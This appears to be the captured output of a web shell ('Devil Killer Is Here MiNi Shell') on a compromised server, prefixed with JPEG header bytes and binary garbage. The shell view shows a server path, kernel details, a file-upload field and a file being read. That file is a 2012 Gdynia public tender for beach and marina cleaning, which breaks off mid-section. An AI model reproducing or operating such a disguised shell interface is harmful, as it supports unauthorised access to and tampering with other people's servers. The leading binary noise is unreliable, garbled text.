JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120403/76463-N-2012.html

<p class="kh_header"><b>Gdynia: SPRZĄTANIE I UTRZYMANIE CZYSTOŚCI GDYŃSKICH PLAŻ 
I PRZYSTANI JACHTOWEJ W SEZONIE 2012/2013</b><br>
<b>Numer ogłoszenia: 76463 - 2012; data zamieszczenia: 03.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdyński Ośrodek Sportu i Rekreacji , ul. Olimpijska 5/9, 81-538 Gdynia, woj. pomorskie, tel. 058 6223574, faks 058 6223574.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gosirgdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SPRZĄTANIE I UTRZYMANIE CZYSTOŚCI GDYŃSKICH PLAŻ 
I PRZYSTANI JACHTOWEJ W SEZONIE 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia zgodnie z CPV sklasyfikowany jest jako: 90680000-7 - usługi sprzątania plaż.
2.	Przedmiotem zamówienia jest sprzątanie i utrzymanie czystości plaż i przystani jachtowej położonych na terenie miasta Gdyni o łącznej długości około 10 km, z wyłączeniem miejsc wygrodzonych na prowadzenie działalności przez osoby trzecie. 
3.	Usługi dotyczą następujących plaż i terenów:
1)	(Rejon A) Plaża BABIE DOŁY (od wejścia nr 1 do wejścia nr 3), powierzchnia plaży - 24.575 m2, pow. terenów zielonych - 61.229 m2 - zgodnie z mapą stanowiącą załącznik nr 24 SIWZ,
2)	(Rejon B) Plaża OKSYWIE (od wejścia nr 3 do wejścia nr 5), powierzchnia plaży -      10.000 m2, pow. terenów zielonych - 11.014 m2 - zgodnie z mapą stanowiącą załącznik nr 25 SIWZ,
3)	(Rejon C):
a)	Plaża ŚRÓDMIEŚCIE (od wejścia nr 6 do wejścia nr 11) łącznie z placem zabaw, budynkiem sanitarnym dla ratownika i drewnianymi trapami; powierzchnia plaży - 40.500 m2, powierzchnia terenów zielonych - 5.311 m2 - zgodnie z mapami stanowiącymi załączniki nr 9-11 SIWZ,
b)	przystań jachtowa; powierzchnia przystani 10.320 m2, powierzchnia akwenu wodnego 37.000 m2 - zgodnie z mapą stanowiącą załącznik nr 26 SIWZ,
4)	 (Rejon D) Plaża REDŁOWO - KĄPIELISKO STRZEŻONE (od wejścia nr 11 do 14), powierzchnia plaży 13.332 m2, pow. terenów zielonych 2.550 m2 - zgodnie z mapami stanowiącymi załączniki nr 11-14 do SIWZ,
5)	(Rejon E) Plaża OD OPASKI BETONOWEJ DO CYPLA REDŁOWSKIEGO (KLIFU) (od wejścia nr 13 do wejścia nr 14), powierzchnia plaży - 15.119 m2, pow.       terenów zielonych - 5.139 m2 - zgodnie z mapami stanowiącymi załączniki nr 14-15 do SIWZ,
6)	(Rejon F) Plaża OD CYPLA REDŁOWSKIEGO DO MOLA W ORŁOWIE (od wejścia nr 15 do wejścia nr 16), powierzchnia plaży - 6.528m2, pow. terenów zielonych -  6.352 m2 - zgodnie z mapami stanowiącymi załączniki nr 16-17 do SIWZ,
7)	(Rejon G) Plaża OD MOLA W ORŁOWIE Z WEJŚCIEM NA PLAŻĘ PRZY ULICY PRZEBENDOWSKICH (od wejścia nr 16 do 18), powierzchnia plaży - 8.894m2, pow. terenów zielonych - 6.846 m2  - zgodnie z mapami stanowiącymi załączniki nr 18-19 do SIWZ,
8)	 (Rejon H) Plaża OD WJAZDU OD KOLIBEK DO GRANICY ADMINISTRACYJNEJ SOPOTU (od wejścia nr 18 do 20), powierzchnia plaży - 31.959 m2, pow. terenów zielonych - 19.866 m2 - zgodnie z mapami stanowiącymi załączniki nr 20-23 do SIWZ,
w granicach szczegółowo określonych w załączniku nr 1 do SIWZ Granice plaż i terenów objętych oczyszczaniem. 
Razem powierzchnia plaż od Babich Dołów do granicy administracyjnej Sopotu wynosi ok. 150.907 m2, przystani jachtowej położonej w Gdyni przy Alei Jana Pawła II 13 A (zwanej dalej Mariną) 10.320 m2, akwenu wodnego Mariny 37.000 m2, a pozostałych terenów tj. terenów zielonych, skarp, kamieni, schodów itp.- ok. 118.307 m2.
Ogółem powierzchnia do oczyszczania - ok. 316.534 m2 
4.	Charakterystyka i zakres usług stanowiących przedmiot zamówienia: 
1)	Sprzątanie ręczne - (nie dotyczy terenu Mariny) - obejmuje:
a)	zebranie wszystkich zanieczyszczeń stałych z całego terenu objętego zamówieniem łącznie z glonami, wodorostami odkładającymi się wzdłuż linii brzegowej, drewnem, padliną, 
b)	następnie zagrabienie i wyrównanie powierzchni piasku w miejscach występowania zagłębień i pagórków,
c)	zamiatanie schodów,
d)	mycie barier, ławek i balustrad (nie dotyczy mola w Orłowie),
e)	w rejonie plaży Gdynia Śródmieście zamiatanie drewnianych trapów,
f)	w rejonie plaży Gdynia Orłowo zamiatanie mola i Alei Kukowskiego,
g)	w rejonie plaży Gdynia Orłowo w miejscu dopuszczającym wprowadzanie psów na plażę (plaża na szerokości do 100 m) - sprzątnięcie plaży ze wszystkich zanieczyszczeń pozostawionych przez psy,
h)	wywóz odpadów i nieczystości zebranych wskutek wykonania powyżej wskazanych czynności celem ich składowania, unieszkodliwienia lub utylizacji zgodnie z obowiązującymi przepisami,
i)	sprzątanie dwóch przebieralni będących integralną częścią budynku sanitarnego dla ratowników na plaży Gdynia Śródmieście.
W sezonie letnim tj. od 01.06 do 30.09 usługa świadczona będzie  w rejonach wszystkich plaż (plaża Śródmieście łącznie z placem zabaw i budynkiem sanitarnym dla ratownika) codziennie, chyba że Zamawiający dokona rezygnacji z usługi, (sprzątanie ręczne w okresie 15.06 - 30.09 winno odbywać się w godzinach wczesno rannych tj. do godz. 8:00). 
W sezonie zimowym przypadającym na okres:
od 01.05 do 31.05 usługa świadczona będzie w następujący sposób: w rejonie plaży Śródmieście oraz w rejonie placu zabaw i budynku sanitarnego dla ratownika cztery razy w tygodniu tj. w każdy poniedziałek, piątek, sobotę i niedzielę, w rejonie plaż Redłowo, Orłowo (łącznie z częścią plaży dopuszczającej wprowadzanie psów), Babie Doły i Oksywie 2 razy w tygodniu tj. w każdy poniedziałek i piątek, oraz na części plaży w Orłowie (część plaży dopuszczającej wprowadzanie psów) w pozostałe dni tygodnia tj. sobota, niedziela, oraz od wtorku do czwartku,
od 01.10 do 30.04 usługa świadczona będzie w następujący sposób: w rejonie plaży Śródmieście (bez placu zabaw i budynku sanitarnego dla ratownika) 2 razy w tygodniu, w rejonach plaż Redłowo, Orłowo 6 razy w miesiącu, (z tym zastrzeżeniem, że usługa będzie świadczona z częstotliwością co najmniej 1 raz w każdym tygodniu) w rejonie plaży Babie Doły i Oksywie 2 razy w miesiącu, w rejonie placu zabaw i budynku sanitarnego dla ratownika 19 razy w miesiącu, średnio co drugi dzień,
- chyba że Zamawiający dokona rezygnacji z usługi.
2)	Oczyszczanie piasku - obejmuje: 
a)	mechaniczne przesiewanie piasku plażowego na głębokość konieczną do wyeliminowania na głębokości najmniej 15 cm zanieczyszczeń typu: niedopałki po papierosach, odpady bytowo-gospodarcze, inne pochodzenia organicznego, 
b)	napowietrzenie i spulchnienie piasku poprzez odwrócenie jego spodniej warstwy, 
c)	wyrównanie terenu plaż celem likwidacji zagłębień i pagórków, 
d)	wywóz odpadów i nieczystości zebranych wskutek wykonania powyżej wskazanych czynności celem ich składowania, unieszkodliwienia lub utylizacji zgodnie z obowiązującymi przepisami.
W sezonie letnim tj. od 01.05 do 30.09 usługa świadczona będzie w rejonach plaż Babie Doły, Śródmieście, Redłowo, Orłowo na każdorazowe polecenie Zamawiającego (oczyszczanie piasku w okresie 15.06 - 30.09 winno odbywać się w godzinach wczesno rannych tj. do godz. 8:00). 
Zamawiający przewiduje udzielenie ok. 160-ciu takich zabiegów w okresie letnim (w tym Zamawiający przewiduje 20 zabiegów na plaży Babie Doły, 60 zabiegów na plaży Śródmieście, 40 zabiegów na plaży Redłowo, 40 zabiegów na plaży Orłowo), (1 zabieg oznacza jedną usługę oczyszczania piasku na jednej plaży).
3)	Napowietrzanie piasku - obejmuje zespół mechanicznych czynności zmierzających do napowietrzania piasku a następnie równanie powierzchni plaży poprzez bronowanie i grabienie. 
W sezonie letnim tj. od 01.05 do 30.09 usługa świadczona będzie w rejonach plaż Babie Doły, Śródmieście, Redłowo, Orłowo na każdorazowe polecenie Zamawiającego (napowietrzanie piasku w okresie 15.06 - 30.09 winno odbywać się w godzinach wczesno rannych tj. do godz. 8:00).
W sezonie zimowym przypadającym na okres od 01.10 do 30.04, usługa świadczona będzie w rejonach plaż Babie Doły, Śródmieście, Redłowo, Orłowo na każdorazowe polecenie Zamawiającego.
Zamawiający przewiduje udzielenie ok. 92-uch takich zabiegów w okresie letnim, (w tym Zamawiający przewiduje 12 zabiegów na plaży Babie Doły, 30 zabiegów na plaży Śródmieście, 30 zabiegów na plaży Redłowo, 20 zabiegów na plaży Orłowo), i 4 zabiegów w okresie zimowym (w tym Zamawiający przewiduje po jednym zabiegu na każdej plaży), (1 zabieg oznacza jedną usługę napowietrzania piasku na jednej plaży).
4)	Sprzątanie terenów zielonych - obejmuje: 
a)	zebranie wszystkich zanieczyszczeń stałych z całego terenu objętego sprzątaniem wraz z bieżącym utrzymaniem w czystości i w należytym stanie dojść na plażę, 
b)	wywóz odpadów i nieczystości zebranych wskutek wykonania powyżej wskazanych czynności celem ich składowania, unieszkodliwienia lub utylizacji zgodnie z obowiązującymi przepisami.
W sezonie letnim tj. od 01.06 do 30.09 usługa świadczona będzie  w rejonach wszystkich plaż codziennie, chyba że Zamawiający dokona rezygnacji z usługi, (sprzątanie terenów zielonych w dniach od 15.06 do 30.09 winno odbywać się w godzinach wczesno rannych tj. do godz. 8:00). 
W sezonie zimowym przypadającym na okres od 01.05 do 31.05 oraz od 01.10 do 30.04 usługa świadczona będzie w rejonie plaży Śródmieście 2 razy w tygodniu, w rejonach plaż Redłowo, Orłowo 6 razy w miesiącu (z tym zastrzeżeniem, że usługa będzie świadczona z częstotliwością co najmniej 1 raz w każdym tygodniu), a w rejonie plaży Babie Doły i Oksywie 2 razy w miesiącu, chyba że Zamawiający dokona rezygnacji z usługi.
5)	Sprzątanie zanieczyszczeń - obejmuje usunięcie większego rodzaju nieczystości stałych na plażach, w szczególności pozostałości posztormowych (np. powalone drzewa na przejściach komunikacyjnych, wyrzucony sprzęt użytkowy, padlina) również przy użyciu niezbędnego sprzętu  mechanicznego. Sprzątanie zanieczyszczeń piasku w sezonie letnim tj. 15.06 - 30.09 winno odbywać się w godzinach wczesno rannych tj. do godz. 8:00. 
Usługa świadczona będzie stosownie do takiej konieczności, w związku z czym Wykonawca zobowiązany jest sam do bieżącej kontroli terenu objętego tą usługą i do wykonania usługi w razie zaistnienie takiej potrzeby, a także na każde polecenie Zamawiającego.
Zamawiający przewiduje udzielenie ok. 40-stu takich zabiegów w sezonie zimowym tj. od 01.05 do 31.05 i od 01.10 do 30.04 (w tym Zamawiający przewiduje 8 zabiegów na każdej z plaż), oraz 25 takich zabiegów w sezonie letnim tj. od 01.06 do 30.09 (w tym Zamawiający przewiduje 5 zabiegów na każdej z plaż), (1 zabieg oznacza jedną usługę sprzątania zanieczyszczeń na jednej plaży).
6)	Opróżnianie koszy - w ramach tej usługi Wykonawca zobowiązany jest do wystawienia na terenach objętych usługą własnych koszy na śmieci, metalowych, stabilnych, o pojemności ok. 50 l, (z wyjątkiem 10 koszy znajdujących się przy placu zabaw na terenie plaży Śródmieście, będących własnością Zamawiającego), w następującej ilości: 
a)	w sezonie letnim w okresie 01.06 - 30.09 - średnio w odległości co 25 m od siebie w rejonach plaż strzeżonych tj. w ilości Babie Doły - 60 sztuk, Śródmieście - 100 sztuk, Redłowo - 100 sztuk, Orłowo - 120 sztuk, i w odległości średnio co 50 m od siebie w rejonie plaży Oksywie w ilości 40 sztuk, 
b)	w sezonie zimowym tj. od 01.05 do 31.05 - średnio w odległości co 25 m od siebie w rejonach plaż strzeżonych tj. w ilości Babie Doły - 60 sztuk, Śródmieście - 100 sztuk, Redłowo - 100 sztuk, Orłowo - 120 sztuk, i w odległości średnio co 50 m od siebie w rejonie plaży Oksywie w ilości 40 sztuk, w rejonie placu zabaw na terenie plaży Gdynia Śródmieście 10 sztuk, oraz od 01.10 do 30.04 - rejon plaży Śródmieście - 12 sztuk, rejon plaży Redłowo - 3 sztuki, rejon plaży Orłowo - 12 sztuk, 
i do opróżniania koszy własnych i będących własnością Zamawiającego (10 koszy znajdujących się przy placu zabaw na terenie plaży Gdynia Śródmieście), które polega na wyjęciu worka ze śmieciami i włożeniu nowego worka z tworzywa sztucznego a także na zebraniu śmieci w okolicy kosza, które wydostały się z niego wskutek przepełnienia, wywrócenia się kosza lub wiatru. Wykonawca zobowiązany jest do wywozu odpadów i nieczystości celem ich składowania, unieszkodliwienia lub utylizacji zgodnie z obowiązującymi przepisami. 
W sezonie letnim tj. od 01.06 do 30.09 usługa świadczona będzie  w rejonach wszystkich plaż i w rejonie placu zabaw i budynku sanitarnego dla ratownika codziennie, chyba że Zamawiający dokona rezygnacji z usługi. Wykonawca w ramach jednej jednostki miary usługi (jeden dzień na jednej plaży) zobowiązany jest na bieżąco dbać o czystość koszy i nie dopuścić do ich przepełnienia. 
W sezonie zimowym przypadającym na okres:
od 01.05 do 31.05 usługa świadczona będzie w następujący sposób: w rejonie plaży Śródmieście i w rejonie placu zabaw i budynku sanitarnego dla ratownika cztery razy w tygodniu tj. w każdy poniedziałek, piątek, sobotę i niedzielę, w rejonie plaż Redłowo, Orłowo, Babie Doły i Oksywie dwa razy w tygodniu tj. w każdy poniedziałek i piątek,
od 01.10 do 30.04 usługa świadczona będzie w następujący sposób: w rejonie plaży Śródmieście (bez placu zabaw i przyległego budynku sanitarnego dla ratownika), 2 razy w tygodniu, w rejonie plaż Redłowo, Orłowo 6 razy w miesiącu (z tym zastrzeżeniem, że usługa będzie świadczona co najmniej 1 raz w każdym tygodniu), w rejonie placu zabaw i budynku sanitarnego dla ratownika na plaży Śródmieście 19 razy w miesiącu, średnio co drugi dzień,
- chyba że Zamawiający dokona rezygnacji lub zleci dodatkowy termin świadczenia usługi na którejkolwiek z plaż lub terenów objętych przedmiotem zamówienia.
W ramach usługi do obowiązków Wykonawcy należeć będzie także w okresie sezonu letniego (15.06 - 30.09) odbiór i wywóz śmieci z postawionych na plażach obiektów socjalno-sanitarnych (plaża Babie Doły, Śródmieście, Orłowo, Redłowo).
Wykonawca zobowiązany jest dbać o estetykę koszy, w tym przede wszystkim winny być w jednolitym kolorze, odświeżone, pomalowane bez śladów rdzy, czy też odpryśniętej farby.
7)	Sprzątanie dyżurne - obejmuje zapewnienie stałej obsługi plaż w godz. 10:00 - 18:00 w zakresie zbierania na bieżąco śmieci i zanieczyszczeń, w szczególności tych pozostawianych na plaży przez jej użytkowników (turystów), a także grabienie obszaru boisk do rozgrywek sportowych organizowanych przez Zamawiającego na terenie plaż,  w następującej obsadzie osobowej: 
a)	plaża Babie Doły i Oksywie - 1 osoba, 
b)	plaża Śródmieście - 2 osoby,  
c)	plaża Redłowo - 1 osoby, 
d)	plaża Orłowo - 1 osoba.
Jednostką miary usługi sprzątania dyżurnego jest jeden dzień obsługi na jednej plaży, z tym zastrzeżeniem, że plaża Babie Doły i plaża Oksywie, w tym przypadku traktowane są jako jedna plaża.
Usługi sprzątania dyżurnego na terenie plaż, o których mowa powyżej świadczone będą codziennie w okresie otwarcia kąpielisk tj. 20.06 - 31.08, chyba że Zamawiający dokona rezygnacji z usługi, a w pozostałe dni jedynie na dodatkowe polecenie Zamawiającego. Zamawiający przewiduje 4 zabiegi w okresie zimowym (w tym Zamawiający przewiduje 1 zabieg na każdej plaży).
8)	Zimowe utrzymanie schodów - obejmuje odśnieżanie i oczyszczanie z lodu schodów oraz wejść i zejść na wszystkie plaże objęte zakresem zamówienia, w tym trapów na plaży Śródmieście, tarasów i mola w Orłowie. 
Usługa zimowego utrzymania schodów będzie świadczona w okresie zimowym stosownie do takiej konieczności, w związku z czym Wykonawca zobowiązany jest sam do bieżącej kontroli terenu objętego tą usługą i do wykonania usługi w razie zaistnienie takiej potrzeby, a także na każde polecenie Zamawiającego.
Zamawiający przewiduje udzielenie ok. 150-ciu takich zabiegów w okresie obowiązywania umowy, (w tym Zamawiający przewiduje 30 zabiegów na każdej z plaż), (1 zabieg oznacza jedną usługę zimowego utrzymania schodów na jednej plaży).
9)	Sprzątanie ręczne Mariny - obejmuje:
a)	zebranie wszystkich zanieczyszczeń stałych z terenów zielonych umiejscowionych przed i za biurem bosmanatu przystani, parkingu miejskiego, Nabrzeży Młodych Żeglarzy i Beniowskiego, Falochronu Wschodniego oraz drogi dojazdowej i wyjazdowej,
b)	wywóz odpadów i nieczystości zebranych wskutek wykonania powyżej wskazanych czynności celem ich składowania, unieszkodliwienia lub utylizacji zgodnie z obowiązującymi przepisami.
W sezonie letnim tj. od 01.05 do 30.09 usługa świadczona będzie codziennie przez 4 godziny przez jedną osobę Wykonawcy, chyba że Zamawiający dokona rezygnacji z usługi (sprzątanie ręczne Mariny w okresie 15.06 - 30.09 winno odbywać się w godzinach wczesno rannych tj. do godz. 9:00). Zamawiający przewiduje udzielenie ok. 153-ch takich zabiegów w sezonie letnim
W sezonie zimowym przypadającym na okres od 01.10 do 30.04 usługa świadczona będzie jedynie na polecenie Zamawiającego. Zamawiający przewiduje udzielenie jednego takiego zabiegu.
10)	Zamiatanie Mariny - obejmuje oczyszczenie Nabrzeży Beniowskiego i Młodych Żeglarzy, Falochronu Wschodniego oraz drogi dojazdowej i wyjazdowej z przystani samojezdną zamiatarką mechaniczną przeznaczoną do zamiatania chodników o masie własnej poniżej 1 tony. 
W sezonie letnim tj. od 01.05 do 30.09 usługa świadczona będzie na każdorazowe polecenie Zamawiającego. 
Zamawiający przewiduje udzielenie ok. 5-ciu takich zabiegów w sezonie letnim.
11)	Sprzątanie zanieczyszczeń z wody - dot. akwenu wodnego Mariny - obejmuje usunięcie z wody nieczystości stałych przy użyciu odpowiedniego sprzętu np. czerpaków. 
W sezonie letnim  tj. od 01.06 do 30.09 usługa świadczona będzie na każdorazowe polecenie Zamawiającego (sprzątanie zanieczyszczeń z wody w okresie 15.06 - 30.09 winno odbywać się w godzinach wczesno rannych tj. do godz. 8:00). 
Zamawiający przewiduje udzielenie ok. 20-tu takich zabiegów w sezonie letnim. 
W sezonie zimowym przypadającym na okres od 01.05 do 31.05 oraz od 01.10 do 30.04 usługa świadczona będzie na każdorazowe polecenie Zamawiającego. 
Zamawiający przewiduje udzielenie ok. 4-ch takich zabiegów w sezonie zimowym.
12)	Odśnieżanie Mariny - obejmuje odśnieżanie i oczyszczanie z lodu drogi dojazdowej i wyjazdowej z Mariny, dróg wewnętrznych tj. Nabrzeża Beniowskiego i Nabrzeża Młodych Żeglarzy oraz parkingu Mariny. 
Usługa odśnieżania Mariny będzie świadczona w okresie zimowym stosownie do takiej konieczności, w związku z czym Wykonawca zobowiązany jest sam do bieżącej kontroli terenu objętego tą usługą i do wykonania usługi w razie zaistnienie takiej potrzeby, a także na każde polecenie Zamawiającego.
Zamawiający przewiduje udzielenie ok. 16-u takich zabiegów w okresie obowiązywania umowy.
5.	W przypadku zmiany okoliczności oraz zmiany potrzeb Zamawiającego możliwe są odstępstwa od ilości i częstotliwości świadczenia usług określonych w ust.5. 
6.	W przypadku polecenia Zamawiającego wykonania usługi usługa ta winna być wykonana przez Wykonawcę niezwłocznie, chyba że Zamawiający wskaże lub strony ustalą inny termin jej wykonania. 
7.	Wykonawca po wykonaniu każdej usługi powinien każdorazowo zwrócić się o potwierdzane jej wykonania do Zamawiającego.
8.	Wykonawca zobowiązany jest świadczyć usługi zgodnie z obowiązującymi w tym zakresie przepisami, w tym zgodnie z ustawą z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach oraz ustawą z dnia 27.04.2001 r. o odpadach. 
9.	W przypadku stwierdzenia przez Wykonawcę pojawienia się na wodzie plam ropopochodnych Wykonawca zobowiązany jest o tym fakcie powiadomić niezwłocznie Urząd Morski oraz Zamawiającego. W przypadku znalezienia martwego zwierzęcia, w szczególności ptaka, Wykonawca zobowiązany jest o tym fakcie powiadomić Straż Miejską.  
10.	Wykonawca zobowiązany jest wskazać w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. Wykonawca ponosi pełną odpowiedzialność za prace wykonane przez podwykonawców.
11.	Rozliczenie stron za wykonanie zamówienia dokonywane będzie za okresy miesięczne w oparciu o faktycznie wykonane przez Wykonawcę usługi.
12.	Zamawiający nie przewiduje zawarcia umowy ramowej.
13.	Zamawiający nie ustanawia dynamicznego systemu zakupów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>13.	Zamawiający przewiduje możliwość udzielania zamówień uzupełniających nieprzekraczających łącznie 5% wartości zamówienia podstawowego, o których mowa w art.67 ust.1 pkt.6 Ustawy. Zamówienia uzupełniające mogą dotyczyć całości przedmiotu zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.68.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępując do przetargu obowiązany jest przed upływem terminu składania ofert określonego w Rozdziale 15 SIWZ wnieść wadium w wysokości 10.000,00 zł (dziesięć tysięcy złotych).
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu, 
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3)	gwarancjach ubezpieczeniowych, 
4)	gwarancjach bankowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.   
3.	Wadium wniesione w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w Nordea Bank Polska S.A. O/ Gdynia nr 28 1440 1026 0000 0000 0042 2924 z dopiskiem wadium na sprzątanie i utrzymanie czystości gdyńskich plaż i przystani jachtowej w sezonie 2012/2013. 
4.	Wadium wnoszone w pieniądzu uważa się za wniesione skutecznie wówczas, gdy przed upływem terminu do składania ofert tj. do dnia 16 kwietnia 2012 r. do godz. 9:30 nastąpi uznanie na rachunku bankowym Zamawiającego.
5.	Wadium wnoszone w formie innej niż pieniężna musi spełniać następujące warunki:
1)	odpowiadać co do wartości wysokości wadium określonej powyżej w ust.1,
2)	odpowiadać co do terminu ważności terminowi związania ofertą określonemu w SIWZ, 
